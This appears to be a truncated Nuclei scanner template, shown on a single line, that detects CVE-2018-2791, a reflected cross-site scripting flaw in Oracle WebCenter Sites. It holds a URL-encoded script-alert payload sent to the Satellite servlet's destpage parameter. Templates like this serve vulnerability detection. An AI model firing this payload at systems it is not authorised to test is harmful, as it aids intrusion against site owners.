id: CVE-2018-2791 info: name: Oracle WebCenter Sites XSS author: madrobot severity: medium description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware requests: - method: GET path: - "{{BaseURL}}/servlet/Satellite?destpage=%22%3Ch1xxx%3Cscriptalert(1)%3C%2Fscript&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError" matchers-condition: and matchers: - type: word words: - "